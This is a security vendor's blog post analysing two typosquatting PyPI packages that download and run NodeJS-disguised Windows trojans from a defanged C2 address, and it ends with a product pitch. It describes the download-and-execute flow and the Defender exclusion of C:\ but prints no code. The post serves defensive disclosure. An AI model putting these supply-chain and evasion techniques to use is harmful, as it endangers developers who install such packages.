Recently identified PyPI packages called "netfetcher" and "pyfetcher" impersonate open source libraries and target Windows users with malicious executables that have a zero detection rate among leading antivirus engines. Furthermore, some of these executables are called "node.exe" and even bear the NodeJS icon and metadata, making them evasive and easily mistaken for legitimate libraries.
"PyFetch for Windows" not
Tracked as sonatype-2024-3204, the PyPI packages "netfetcher" and "pyfetcher" describe themselves as utilities for Windows with identical names. But instead, these download malicious executables which, despite drawing suspicion from human analysts, may otherwise miss the scrutiny of machines given their highly evasive nature.
As an example, the "__init__.py" file in a version of one of these packages was seen downloading a Windows binary from IP address 194.163.191[.]205:
The binary is then renamed to "netflix_checker_cache.exe" and launched.
Netflix "Checker" is a colloquial term used by digital pirates and skid programmers to refer to unofficial utilities designed to check whether or not a provided list of usernames and passwords represents active Netflix accounts. But, that's merely a misnomer here.
Sonatype security researcher Adam Reynolds, who analyzed the package, explains:
"There isn't much going on here in terms of the behavior of the python package itself. No attempt was made to obfuscate the code that downloads and executes the binary, or to hide it among legitimate functionality; a cursory look at the code would arouse any developer's suspicion," says the researcher.
"The description bills the package as 'PyFetch for Windows,' and the name, pyfetcher, is close enough to the target that it's conceivable that someone could download the package in error or through a typo."
Malicious "node" binary undetected by antivirus engines
Reynolds explains, however, that the binary that the package downloads is more interesting.
The aforementioned Netflix Checker binary, a 64-bit Windows executable has also been known as node.exe previously [VirusTotal analysis] and at the time of detection had a zero detection rate lasting days.
"The file hash wasn't flagged by the major antivirus vendors, so at least some care was taken by the threat actor towards concealment," states the researcher.
"However, some artifacts from later stages of the attack have been observed in the wild before, so this is not a completely novel malware. At the time of writing the threat actor's C2 server is still active, so it remains a serious threat to anyone who did download the package."
The Netflix Checker executable (previously known as "node.exe" in other attacks) also bears the official NodeJS logo and metadata (including the description, file version, and copyright notice) that can make it appear to be the legitimate NodeJS for Windows library.
As to what this executable does?
It downloads and drops another executable called Update56b2.exe [VirusTotal analysis] from the same IP address which also had a zero detection rate among leading antivirus engines.
The 64-bit executables come with extensive anti-detection and stealth capabilities, which explains the low detection rate. As soon as these run, they attempt to exclude the entire primary Windows hard drive ("C:\") from virus scanners like Windows Defender so that as to prevent security alerts from appearing.
During the course of its execution, the executables continue to communicate with the aforementioned IP address, the command-and-control (C2) server where these were downloaded from.
Ultimately, these executables belong to the class of trojans and info-stealers that we have repeatedly seen before.
Open source malware blocked by Sonatype Repository Firewall
This isn't the first time a stunt like this has been pulled, but it's a stark reminder of threat actors' evolving tactics and commitment to exploiting the open source ecosystem for nefarious reasons. The case highlights a pressing need for improved supply chain security measures and greater vigilance in monitoring third-party software registries developers. Organizations must prioritize security at every stage of the development process to mitigate risks associated with third-party dependencies.
Sonatype Repository Firewall and Sonatype Lifecycle stay on top of nascent attacks and vulnerabilities and provide you with detailed insights to thwart previously undetected malware, Potentially Unwanted Applications (PUAs), and vulnerable components from reaching your builds:
Threat actors create malicious software components and distribute them through public open source repositories. This tactic is growing in popularity, and malicious open source is rapidly expanding.
Malicious open source is designed to evade typical software composition analysis (SCA) scanners. However, users of Sonatype Repository Firewall can rest easy knowing that these packages would automatically be blocked from reaching their development builds and keep their software development life cycle (SDLC) hygienic.
If you're not already protected with Sonatype, get in touch so we can show you Repository Firewall in action.
Written by Ax Sharma
Ax is a Staff Security Researcher & Malware Analyst at Sonatype with a penchant for open source software. His works and expert analyses have frequently been featured by leading media outlets including the BBC. Ax's expertise lies in security vulnerability research, reverse engineering, and cybercrime investigations. He has a passion for educating a wide range of audiences through writing and vlogs.
Explore All Posts by Ax Sharma